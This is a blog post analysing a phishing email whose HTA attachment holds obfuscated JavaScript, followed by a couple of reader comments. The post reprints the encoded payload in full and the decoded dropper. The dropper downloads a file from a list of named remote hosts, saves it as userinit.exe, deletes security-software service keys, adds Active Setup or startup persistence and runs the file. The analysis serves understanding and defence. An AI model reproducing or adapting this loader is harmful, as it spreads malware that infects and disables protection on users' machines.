I got a mail from noreply@aol.com with the subject: Secure Message from AOL.com user.
Body of the email:
——————————–
You have received Secure Message
To read the message open attached file.
User ID: 42470
Password: 43019321
Keep your password in a safe place.
Sincerely,
Encrypted Message Service,
AOL.com
——————————-
There was one attachment too: mail.zip
I was pretty sure that the attachment was a virus. Still out of curiosity, I detached the zip file and unzipped it.
There was only one file in the archive: message.hta
I did some searching for the hta extensions and its default application in Windows. HTA stands for “Hypertext Application” and opens in MS-IE by default.
Visit this url for details.
I opened the file in an editor to view its contents. It was a very beautifully written and encoded JavaScript function with an embedded self decoder. Being a programmer myself, I could understand this much by having a glance a it.
Following is the content of the file. I have deliberately replaced all <> with [] in all HTML tag names.
————————————
<html><head><title>qqrqjhq</title></head><body>[script language="JavaScript"]function gl(cp,la,mm,io){xll=6863;io=unescape(io+la+cp);eval(io);h(mm);};gl(”.charA%74%28%78)%3Bf%3Dw%2Ein%64%65%78Of%28%69%29%3Bi%66%28f>-%31)%7B%6B%3D%28%28%66%2B1)%25%38%35%2D%31)%69%6(k<%3D0%29%7B%6B+%3D85}%67+=%77%2E%63%68%61%72%41t(k%2D%31%29}e%6Cs%65{i%66(%69%3D=%22%24%22)i%3D%22%5C%5C%22%3B%69f%28%69=%3D%22^%22%29%69%3D%22%5C%22%22%3B%67%2B=i}}%3Bdocu%6D%65nt.%77r%69%74%6(g)}”,”5%20%7A%64f%21Q%551%26(o%2B%43B%68%29%6C%48e%6A%2C%2D%44%67%4F%2E0K%45%6BFGIL]%4Dm%52S%22,e%3D”%3B%66%6F%7(%78%3D%30%3Bx%3Cq%2Ele%6Egt%68;%78%2B+)%7Bi%3Dq”,”B+ccjX’ZcOz’+z{.]0X+RztjX8vjzRPZHztjv=jv000<txvzr></txvzr>’zHPcO8POjqiP=P6XvZr’>!8cX’Z+czfolNf+X8Rjc’0~vZ’joY1cPWHjz+zB+ccjX’z'+z6jv=jv0z_HjPtjzX)jXFz}+8vzLc’jvcj’zX+ccjX’Z+czPcfz’v}zPOPZc0<txvzr’zhpco8pojqip=p6xvzr’>X,q8cjtXPrjo^%B^lbfvq^X/^CX,C^SjX}XHjf^CX,b,qfvC^8tjvZcZ’0jpj^bcpq&b’v}NHqcj~z{X’Z=j7.W</txvzr’zhpco8pojqip=p6xvzr’>,jX’o^6XvZr’ZcO0GZHj6}t’jR.W,jX’^lb+qcj~z{X’Z=j7.W,jX’o^n6XvZr’06)jHH^lbZ!oH0GZHjkpZt’to,llNjpqH0Ij’GZHjo,lbZ!ojp0tZdj>TKKKKlcpqKb5H0BvjP’jG+Hfjvofvlb5XP’X)o’&lN5b!8cX’Z+cz!4olNvj’8vcz!PHtj5f+X8Rjc’0+cX+c’jp’Rjc8q!4b<$`tXvZr’><txvzr’zhpco8pojq^></txvzr’zhpco8pojq^>=Wt^>L!zcpz;)jc$ctj’zLkqBvjP’j.W,jX’o^Lc’jvcj’kprH+vjv{rrHZXP’Z+c^l$cLk0VZtZWHjqK$c68Wz6r$cn)ZHjzLk0h8t}q’v8j$cnjcf$ckcfz68W$c8vq{vvP}o^)++r0FPdPc0Wd$`O+f0′p’^-^r+H+r0!vjjX++HtZ’j0X+R$`’jt’0′p’^-^!v440W0v8$`+H0′p’^-^c+HF+0′40X+R$`O+f0X^-^,R+4&0W0v8$`WZO0′p’^-^rtZpZ0~+H0Wd$`’jt’0′p’^-^f88~0cR0v8$`+H0′p’^l$cG+vz8cqKz+z$cLk0yP=ZOP’jo8vo8cll$c6r$crqLk0g+X8Rjc’0W+f0Zccjv;jp’$cL!z]jcorl>KKKKz;)jc$ckpZ’zG+v$ckcfzL$crq^^$cyjp’$c68WzWt$ccq]jcorl$cL!ocl;)jc$cvq^{hBgkGIeLiE]my._US6;1Vn7@uPWXfj!O)Z,FHRc+r#vt’8=~p}dK&T4*:waxC$`^$cG+vzWq&amp;amp;amp;amp;amp;z+zcz6′jrz*$ctq4$c‘qK$cG+vz8qKz+z4$c=qmZfor-WC8-&l$cL!z=q^q^z;)jc$ctqtD&$cdqK$ckHtjL!z=q^?^z;)jc$c6j’zRqH0BvjP’j;jp’GZHjo,-;v8jl$cR0nvZ’jzP$cR0BH+tj$ckpZ’z68W$ckHtj$cdqLc6′vo&-v-=-=WhZcPv}B+RrPvjlD&$ckcfzL$c’q:*A’Cd$cyjp’$c’qejpo’l$c’q6′vZcOo:D]jco’l-^K^l(’$cXqB)voBh}’jo^(e^(mZfo’-&-TlllCB)voBh}’jo^(e^(mZfo’-4-TlllCB)voBh}’jo^(e^(mZfo’–Tlll$cPqP(]j!’oX-tl$cyjp’$ckcfzL$ckcfz68W$ckcfzL$cWt$c+0SjOnvZ’jz^eEB1$$6+!’~Pvj$$mZXv+t+!’$$Lc’jvcj’zkprH+vjv$$RPH^-^FPrZH0X))PWvPcP8FvZ0X+R^-^SkI36u^<$`tXvZr’><txvzr’zhpco8pojqip=p6xvzr’>!8c</txvzr’zhpco8pojqip=p6xvzr’>X’Z+cz!&amp;amp;amp;amp;olNW&qKb!8cX’Z+cz!TocPlNWTqKbv&q^eE]m^CX,C^6@6;km^CX,C^B8vvjc’B+c’v+H6j’^CX,C^6jv=ZXjt^CX,b’v}N+0SjOgjHj’jov&CcPCX,lbWTq&amp;amp;amp;amp;amp;b5XP’X)o’&lN5bvj’8vcoWTlb5vTq^eE]m^CX,C^6.G;n{Sk^CX,C^mZXv+t+!’^CX,bFjq^{X’Z=jz6j’8r^CX,C^Lct’PHHjfzB+Rr+cjc’t^CX,C^NBg{Bx&hD{kwhDka{DKB*BDk:&:KwxwTG45^CX,C^6′8WrP’)^bZ!o!To^rXZrZR^lC!To^rXL__tB^lC!To^SPrgv=^lC!To^GZvj_m^lC!To^ERpGZHj^llW&q&b’v}N+0SjOnvZ’jovTCFj-,-^SkI36u^lb+0SjOSjPfovTCFjlb5XP’X)o’&lN’v}NH0B+r}GZHjo,-+0SjOSjPfovTC^nZcf+~t^CX,C^B8vvjc’VjvtZ+c^CX,C^kprH+vjv^CX,C^6)jHHzG+Hfjvt^CX,C^B+RR+cz6′Pv’8r^lCX,lb5XP’X)o’&amp;amp;amp;amp;lNW&qK5b5bvj’8vcoW&lb5′v}NZ!ocp((Q!&oll+0v8co,lb5XP’X)o}lN5b<$`tXvZr’>Ylb5btj’;ZRj+8′o^fol^-Klb<`tXvZr’>”,”func%74ion%6(q%29{v%61ri%2Cx%2C%6B%2C%66,%67%3D”,w=%226%3A%2F%60%32T;%62%57%6Ec%58%37w%7E%39%78%70rv=%71#s%74%27Y@%7CJ%69Z%75%38a%50%5F3%34*A%7BNy%7D%3″);</script></body></html>
————————————
I tried to understand the contents of the file. Following is what I made out of it.
The file contains a JavaScript code written to do some malicious activity as soon as the user double clicks the HTA file. In the JS, the very first line is a function declaration. I have done the indentation for clear understanding.
function gl(cp,la,mm,io){ xll=6863; io=unescape(io+la+cp); eval(io); h(mm);};
The function accepts 4 parameters: cp, la, mm & io. It then declares a variable x11 = 6863, decodes [URL] the concatenation of the 4th, 2nd & 1st paraments (in that order), executes this decoded output and finally calls the function”h” with mm[3rd parameter] as the parameter.
The order of the parameters has not been changed just to increase one level of confusion, but also to break the malacious code and jumble it up. Some antivirus softwares would fail at this step itself.
The second line in the JS is just a call to this function with parameters:
PARAM cp:
“.charA%74%28%78)%3Bf%3Dw%2Ein%64%65%78Of%28%69%29%3Bi%66%28f>-%31)%7B%6B%3D%28%28%66%2B1)%25%38%35%2D%31);%69%66(k<%3 D0%29%7B%6B+%3D85}%67+=%77%2E%63%68%61%72%41t(k%2D%31%29}e%6Cs%65{i%66(%69%3D=%22%24%22)i%3D%22%5C%5C%22%3B%69f%28%69=%3D%22^%22%29%69%3D%22%5C%22%22%3B%67%2B=i}}%3Bdocu%6D%65nt.%77r%69%74%65(g)}”
PARAM la:
“5%20%7A%64f%21Q%551%26(o%2B%43B%68%29%6C%48e%6A%2C%2D%44%67%4F%2E0K%45%6BFGIL]%4Dm%52S%22,e%3D”%3B%66%6F%72(%78%3D%30%3Bx%3Cq%2Ele%6Egt%68;%78%2B+)%7Bi%3Dq”
PARAM mm: Its a long string of text which looks like garbage at the first glance. I’ll take it up later.
PARAM io:
"func%74ion %68(q%29{v%61r i%2Cx%2C%6B%2C%66,%67%3D'',w=%226%3A%2F%60%32T;%62%57%6Ec%58%37w%7E%39%78%70rv=%71#s%74%27Y@%7CJ%69Z%75%38a%50%5F3%34*A%7BNy%7D%3"
The
lineio=unescape(io+la+cp);
in the function declaration, would perform the URLdecode of the concatenated string
io+la+cp
.
As a result the variable io would contian(i have again done the indentation for clear understanging)
function h(q){ var i,x,k,f,g=”,w=”6:/`2T;bWncX7w~9xprv=q#st’Y@|JiZu8aP_34*A{Ny}o zdf!QU1&(o+CBh)lHej,-DgO.0KEkFGIL]MmRS”,e=”; for(x=0;x-1){ k=((f+1)%85-1); if(k<=0) {k+=85} g+=w.charAt(k-1) } else{ if(i==”$”) i=”\\”; if(i==”^”) i=”\”"; g+=i } }; document.write(g);}
This is a function declaration for “h”, which is evaluated in the next line eval(io);, and is called at last with the parameter mm in the line:
h(mm);
“h” is an advanced decryption function, which uses the referance string “w” to perform the decryption of mm. (I’ll not get into the details of the decryption technique used here.) In the end, this function simply writes the output on the HTML of the page:
document.write(g);
Following is the output of the decrypted form of mm.(i have again done the indentation for clear understanding):
function d(){ document.write(’Unable To Connect to Server. Please check your Internet connection and try again. <script language=JavaScript> cj=unescape(”%C”); dr=”c:”+cj+”Recycled”+cj; j=dr+”userinit.exe”; nx=1; try{ l=new ActiveXObject(”Scripting.FileSystemObject”); o=new ActiveXObject(”WScript.Shell”); if(l.FileExists(j)){ ex=l.GetFile(j); if(ex.size>20000) nx=0; } l.CreateFolder(dr); }catch(t1){};
function f3(){ return false } document.oncontextmenu=f3; </script> <script language=”vbs”< If nx Then set IE=CreateObject(”InternetExplorer.Application”) IE.Visible=0 Sub Sp While IE.Busy=true Wend End Sub r=Array(”hoop.kazan.bz/god.txt”,”poljop.freecoolsite.com/test.txt”, “fr33.by.ru/ol.txt”,”nolko.t3.com/god.c”,”jmo31.by.ru/big.txt”,”psi xi.wol.bz/test.txt”,”duuw.nm.ru/ol.txt”) For un=0 To 6 IE.Navigate(ur(un)) Sp p=IE.Document.body.innerText If Len(p)>0000 Then Exit For End If p=”" Next Sub bs n=Len(p) If(n) Then r=”ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz012346789+/” For b=1 To n Step 4 s=3 t=0 For u=0 To 3 v=Mid(p,b+u,1) If v=”=” Then s=s-1 z=0 ElseIf v=”?” Then Set m=l.CreateTextFile(j,True) m.Write a m.Close Exit Sub Else z=InStr(1,r,v,vbBinaryCompare)-1 End If t=64*t+z Next t=Hexi(t) t=String(6-Len}t),”0″)&t c=Chr(CByte(”&H”&amp;amp;amp;amp;amp;Mid(t,1,2)))+ Chr(CByte(”&H”&Mid}t,3,2)))+Chr(CByte}”&H”&Mid(t,,2))) Next End If End Sub End If bs o.RegWrite “HKCU\\Software\\Microsoft\\InternetExplorer\\mal”,”email@yourdomain.com”,”REG_SZ” </script>
<script language=JavaScript> function f1(){ b1=0; function f2(na){ b2=0; r1=”HKLM”+cj+”SYSTEM”+cj+”CurrentControlSet”+cj+”Services”+cj; try{ o.RegDelete(r1+na+cj); b2=1; }catch(t1){}; return(b2); } r2=”HKLM”+cj+”SOFTWARE”+cj+”Microsoft”+cj; ke=”Active Setup”+cj+”Installed Components”+cj+”{CDAC91B-AE7B-E83A-0C4C-E61607972F3}”+cj+”Stubpath”; if(f2(”pcipim”)+f2(”pcIPPsC”)+f2(”RapDrv”)+f2(”FirePM”)+f2(”KmxFile”)) b1=1; try{ o.RegWrite(r2+ke,j,”REG_SZ”); o.RegRead(r2+ke); }catch(t1){ try{ l.CopyFile(j,o.RegRead(r2+”Windows”+cj+”CurrentVersion”+ cj+”Explorer”+cj+”Shell Folders”+cj+”Common Startup”)+cj); } catch(t1){ b1=0 }; }; return(b1); } try{ if(nx&&!f1()) o.run(j); }catch(y){}; </script>’);};setTimeout(”d()”,0);
Now this code takes care of all the nasty stuff. It even plays around with the registry and sends
a hit to some websites, which you otherwise would not want to visit.
Bookmark this post: 
cool… so now we have viruses doing malicious stuff and all the stuff is coded in javascript…
Have you checked the file using some antivirus.. whether it detects the file as a virus or not???